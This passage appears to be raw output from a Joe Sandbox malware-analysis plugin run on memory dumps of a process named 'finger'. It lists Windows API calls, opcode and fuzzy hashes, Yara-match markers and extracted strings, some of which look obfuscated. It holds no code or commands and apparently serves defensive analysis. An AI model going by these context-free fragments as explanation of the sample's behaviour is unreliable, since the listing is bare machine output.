                                                                                                      • Instruction ID: aa383df3cbfa17acbd8fad365d057407c4adc4dd4855edb91dadfd3df3e4b3a3
                                                                                                      • Opcode Fuzzy Hash: 3473fbc84f5de4e9ef638430524f151b17afe93dbc7687943e0913540f186df8
                                                                                                      • Instruction Fuzzy Hash: 540192B2215508BBDB44DE99DC85EEB77ADEF8C754F408608BA0DE3241D630F951CBA4
                                                                                                      APIs
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 005F9F05
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2422867632-0
                                                                                                      • Opcode ID: db92189fec3a812eea8a9a67e111a15204625a2f2668b3669d1839d2361ad85c
                                                                                                      • Instruction ID: edfe3ca648574745a3de0669f2ae4d242299b6faec00c4da7ad8630466d6021f
                                                                                                      • Opcode Fuzzy Hash: db92189fec3a812eea8a9a67e111a15204625a2f2668b3669d1839d2361ad85c
                                                                                                      • Instruction Fuzzy Hash: B8F0653338070436E22065E99C02FDB764CDB80761F140429F70CDA1C1D5A6B84146E8
                                                                                                      APIs
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 005F9F05
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2422867632-0
                                                                                                      • Opcode ID: eb2a8d7799c11fcc7e0d595a5d483ba23fad3cd631e5b665474ae8614d04f02a
                                                                                                      • Instruction ID: 6732c09f5fa7928a20d40b4bedcab9af7309f452f7a071e9db2e0663a9624021
                                                                                                      • Opcode Fuzzy Hash: eb2a8d7799c11fcc7e0d595a5d483ba23fad3cd631e5b665474ae8614d04f02a
                                                                                                      • Instruction Fuzzy Hash: 61F06D7228070436E23266AA8C06FDB7A9CDFC1B60F140018F708AA2C1D9A6B84086F8
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00601C06,?,B4613DF6,00601C06,oXa,B4613DF6,?,00601C06,oXa,00001000,?,?,00000000), ref: 00619979
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                                                                      • Instruction ID: 347db8c34d9f9d42f0ee2abbfe7b77f0f08c3b04a7e495c57e59edce2abebe0b
                                                                                                      • Opcode Fuzzy Hash: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                                                                      • Instruction Fuzzy Hash: 8DE092712042047BDA10EE59DC46EDB37ADEFC5710F004409F908A7241D631B851C7B8
                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0060853C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 78caaeef33826840504e2043f515a6604d6ca5fe9c1b0a4c19f806850eb8d1c5
                                                                                                      • Instruction ID: d372e6111aa8fb7d2278b546d3a39dd5c7c4b7bceeb076fcbf4c85bd97a0c11e
                                                                                                      • Opcode Fuzzy Hash: 78caaeef33826840504e2043f515a6604d6ca5fe9c1b0a4c19f806850eb8d1c5
                                                                                                      • Instruction Fuzzy Hash: 87E086712903042BEB68AAA8DC47FE7335DAB88738F184660BD5DDB3C2E978F9514154
                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0060853C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 7b8680feeee384a9cde1c08f30642674778f21929240871f497dd4e73621c6e0
                                                                                                      • Instruction ID: 4220c0cccaf3dac2a2c33ca111107f371832736c5bae3fc668cf48b1e8e2e88f
                                                                                                      • Opcode Fuzzy Hash: 7b8680feeee384a9cde1c08f30642674778f21929240871f497dd4e73621c6e0
                                                                                                      • Instruction Fuzzy Hash: 99E026B64803002BE725A6A49E477EB36196B41338F2C0A64F9A99F2C3E53CD5524224
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00601EF0,006181AF,oXa,00601EC0), ref: 00608333
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2340568224-0
                                                                                                      • Opcode ID: 47f843362389e76ecdee1559b75256e8c3984728e288a0686686b97d3bef1785
                                                                                                      • Instruction ID: daf86e1dc337c68d64d5361d18b47f2a6f0d62db46f10e43f8b2dc46b87407d3
                                                                                                      • Opcode Fuzzy Hash: 47f843362389e76ecdee1559b75256e8c3984728e288a0686686b97d3bef1785
                                                                                                      • Instruction Fuzzy Hash: CBD05E713803053BEA44F6E4DC07F96368D9B40794F050074BA0CDB2C2E969F5004269
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 7cb2ded272928ce2034a7a69d155519340505ab0d6479e82444e303be38e2d74
                                                                                                      • Instruction ID: 38f7cfb229ad54644fe3ccd893dd09929f8f2cda5554e5cd8595bb10683844ee
                                                                                                      • Opcode Fuzzy Hash: 7cb2ded272928ce2034a7a69d155519340505ab0d6479e82444e303be38e2d74
                                                                                                      • Instruction Fuzzy Hash: 18B09B719039D5C5EA51E76046087177D5867D1701F29C4A1E2074641F4739C1D5F275
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3270976336.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2ed0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fa4e9dff2f25cf6ba25235a48aeeac25dcf03243747be0d05e8712814ae51cb3
                                                                                                      • Instruction ID: 1c80d643dc6a3d5cad10ecdca24f86e3bb945f96486c444ebedc585c8d360ac1
                                                                                                      • Opcode Fuzzy Hash: fa4e9dff2f25cf6ba25235a48aeeac25dcf03243747be0d05e8712814ae51cb3
                                                                                                      • Instruction Fuzzy Hash: 3441237065CB0D4FD368EF68D08127AB3E2FB84304F54A52DD98BC7252EB70E8478A84
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0865ff5424ecf9e77f91489767588841e59a8d48a04142e8af4d6f55970ecbfe
                                                                                                      • Instruction ID: d3d539581343e5142ad3ad3cf6bc3a0fcff224ea494eead0084f88fe096c1baf
                                                                                                      • Opcode Fuzzy Hash: 0865ff5424ecf9e77f91489767588841e59a8d48a04142e8af4d6f55970ecbfe
                                                                                                      • Instruction Fuzzy Hash: CCC08033E6041591D3148D5CFC817F0F3E4D797325F047356D514D3144C11AF45146D6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3270976336.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2ed0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                      • API String ID: 0-3558027158
                                                                                                      • Opcode ID: 5a96c6284389f62c30a2dd4d636429b92f6a6b2938730354730b7adc21228ec2
                                                                                                      • Instruction ID: 30ddaa1331b112d43e6d8209729c3be195756f678696b11f58281c2b34213842
                                                                                                      • Opcode Fuzzy Hash: 5a96c6284389f62c30a2dd4d636429b92f6a6b2938730354730b7adc21228ec2
                                                                                                      • Instruction Fuzzy Hash: 89915FF04482988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3270976336.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2ed0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: -nu$ <91$434'$80zf$994z$9<>0$:<1u$;x &$<:;z$<z`f$>:|u$`{eu$anu0$a{a{$a{e{$b{fc$dmab$g{eu$z`fb${bcu${fcu
                                                                                                      • API String ID: 0-2065742749
                                                                                                      • Opcode ID: 9ae20cf4b4557e0ac6225483ce40d05f002ddf7f1f7b9f4d55118934c447bddd
                                                                                                      • Instruction ID: 274cd91a5d6006eb78bfb6d35aaf7b95c42ca36970d3c35a56da2190f3d4a0b3
                                                                                                      • Opcode Fuzzy Hash: 9ae20cf4b4557e0ac6225483ce40d05f002ddf7f1f7b9f4d55118934c447bddd
                                                                                                      • Instruction Fuzzy Hash: 844102B480078CEBCF18CF85D5416DEBB71FF05384F908059E9096F294C7758656CB8A
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                      • API String ID: 48624451-2108815105
                                                                                                      • Opcode ID: 8bbf19137e1a689b43564fd3942a31b41eb1f30e93392e2cd30247d86ab22d34
                                                                                                      • Instruction ID: a006180445f1160aaf5a4e758be28af108d2f1150fb4fab89022bf101dca2647
                                                                                                      • Opcode Fuzzy Hash: 8bbf19137e1a689b43564fd3942a31b41eb1f30e93392e2cd30247d86ab22d34
                                                                                                      • Instruction Fuzzy Hash: 505139B5B06126BFDB61DFD988809BFFBFCBB49200B548669E855D7640D234DE00CBA0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                      • API String ID: 48624451-2108815105
                                                                                                      • Opcode ID: 986a6d06531dba18b5554a135678a42ce8a3a77e89c34066cf8ff078c4ee2637
                                                                                                      • Instruction ID: beb2638b0b3cc89ff28add3ade6ac6f0eaf2272eb495d0ee9bbe40ddf47f561d
                                                                                                      • Opcode Fuzzy Hash: 986a6d06531dba18b5554a135678a42ce8a3a77e89c34066cf8ff078c4ee2637
                                                                                                      • Instruction Fuzzy Hash: E75114B5A01649BEEF20DF9CC88097FB7FDAF44200B088C9AE596C7641E774DA409B60
                                                                                                      Strings
                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03054742
                                                                                                      • Execute=1, xrefs: 03054713
                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 030546FC
                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03054655
                                                                                                      • ExecuteOptions, xrefs: 030546A0
                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 03054787
                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03054725
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                      • API String ID: 0-484625025
                                                                                                      • Opcode ID: d21b7e2dff73da8af09bcac901d7f6e64f49a2cf248cad56a57854eaa066940e
                                                                                                      • Instruction ID: f292cbf5ce131dc3e78dd43e7b8ebb4769c15a75b9e25fa300ad4582c5d8620e
                                                                                                      • Opcode Fuzzy Hash: d21b7e2dff73da8af09bcac901d7f6e64f49a2cf248cad56a57854eaa066940e
                                                                                                      • Instruction Fuzzy Hash: CC513C35A0231A7AEF11EBA5EC85FEF77E8EF44700F1404D9E906AB181DB719A618F50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm
                                                                                                      • String ID: +$-$0$0
                                                                                                      • API String ID: 1302938615-699404926
                                                                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                      • Instruction ID: 71abbea1654adc4d954818849e1272d936493781e03822459052ff1e8e2a1a83
                                                                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                      • Instruction Fuzzy Hash: AF81AA30E076699FDF28CE68C8947EEBFE6AF45320F1C465AD865A7391C6388841CB50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                      • API String ID: 48624451-2819853543
                                                                                                      • Opcode ID: 26fb1d8948e53df70d3cd0bada400280d96e3297f1e8542e34f6d482ed09e395
                                                                                                      • Instruction ID: d4892c213d8ac37792015594265c9ae213720db7d9f473b418878393e673e6f4
                                                                                                      • Opcode Fuzzy Hash: 26fb1d8948e53df70d3cd0bada400280d96e3297f1e8542e34f6d482ed09e395
                                                                                                      • Instruction Fuzzy Hash: 3121817AA0221DABEB10DE69DC50AEEBBECAF54640F080526E905E7200E730D9119BA1
                                                                                                      Strings
                                                                                                      • RTL: Re-Waiting, xrefs: 0305031E
                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 030502BD
                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 030502E7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                      • API String ID: 0-2474120054
                                                                                                      • Opcode ID: 5b290e72f392d1556c8b770b9673151c107426d6428854c6e5eb5a06dadd5644
                                                                                                      • Instruction ID: a7fef09cf2429b43ebc34e0c3511233d790a8da7b063c55a40b117e677bdcf7f
                                                                                                      • Opcode Fuzzy Hash: 5b290e72f392d1556c8b770b9673151c107426d6428854c6e5eb5a06dadd5644
                                                                                                      • Instruction Fuzzy Hash: 99E1BE3060A7429FE765CF28C884B6EB7E4BF84314F180A6DF9A58B2E1D774D945CB42
                                                                                                      Strings
                                                                                                      • RTL: Re-Waiting, xrefs: 03057BAC
                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03057B7F
                                                                                                      • RTL: Resource at %p, xrefs: 03057B8E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                      • API String ID: 0-871070163
                                                                                                      • Opcode ID: d692f0faae1b9e4c7927a08a05d46e590b8be7bb8edffb1c384c97915157f8b4
                                                                                                      • Instruction ID: 8550d1b9a050fbdac6854fdac464c43c2043319d0885c0e0f206eb7cdd863eac
                                                                                                      • Opcode Fuzzy Hash: d692f0faae1b9e4c7927a08a05d46e590b8be7bb8edffb1c384c97915157f8b4
                                                                                                      • Instruction Fuzzy Hash: 8E41D1357027029FD724DE29C840BABB7E5EF88720F140A1DF95ADB680DB71E8158B91
                                                                                                      APIs
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0305728C
                                                                                                      Strings
                                                                                                      • RTL: Re-Waiting, xrefs: 030572C1
                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03057294
                                                                                                      • RTL: Resource at %p, xrefs: 030572A3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                      • API String ID: 885266447-605551621
                                                                                                      • Opcode ID: 5250a84c0569908d5d0fbee2b4d295d9c81a357cb79d744c9496539c9dda3250
                                                                                                      • Instruction ID: b7a9e589890bfa02593aa0c590dbfe4dbfbb6f74bdf5f3e412579bacfb2326ab
                                                                                                      • Opcode Fuzzy Hash: 5250a84c0569908d5d0fbee2b4d295d9c81a357cb79d744c9496539c9dda3250
                                                                                                      • Instruction Fuzzy Hash: A041FF35702306ABD720DE25CC41BAAB7E9FF84B10F144A19FD55EB640DB21E8129BD0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: %%%u$]:%u
                                                                                                      • API String ID: 48624451-3050659472
                                                                                                      • Opcode ID: 7d3cbe4ec9380a83a4ce090e9da2f4aa4c7374d60bfbfbb1439894ef2403ea9d
                                                                                                      • Instruction ID: f4065f3bf1f0d21ecf9deede7d06ddcb371b447083b78fb4733359fe6e109ee8
                                                                                                      • Opcode Fuzzy Hash: 7d3cbe4ec9380a83a4ce090e9da2f4aa4c7374d60bfbfbb1439894ef2403ea9d
                                                                                                      • Instruction Fuzzy Hash: AA318776A0121DAFDF60DE29DC40BEEB7FCEF44650F454596E849D3100EB309A449FA0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm
                                                                                                      • String ID: +$-
                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                      • Instruction ID: 04738edee3afcb325532a709a69817319c653b3b4530badeb0f4e8273c29d78c
                                                                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                      • Instruction Fuzzy Hash: 3891D574E0623A9BDFA4DE69C8817BEBFF5AF44B20F18451AE865E72C1D73089408721
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3271087733.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.00000000030DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000008.00000002.3271087733.000000000314E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_2fb0000_finger.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $$@
                                                                                                      • API String ID: 0-1194432280
                                                                                                      • Opcode ID: cc809f5acc7d5a7538b24569f0a0a5416a424d402693fe455c7a2f012d17cccd
                                                                                                      • Instruction ID: d07ac4ef11024c27df08ddcd2371114ae60df116c2b411c013a04d9ce56b7dbf
                                                                                                      • Opcode Fuzzy Hash: cc809f5acc7d5a7538b24569f0a0a5416a424d402693fe455c7a2f012d17cccd
                                                                                                      • Instruction Fuzzy Hash: A0813CB5D012699BDB31DB54CC44BEEB7B8AF48750F0445EAEA19B7280D7705E80CFA0
                                                                                                      APIs
                                                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0306CFBD
                                                                                                      Strings
                                                                                                      Memory Dump Source
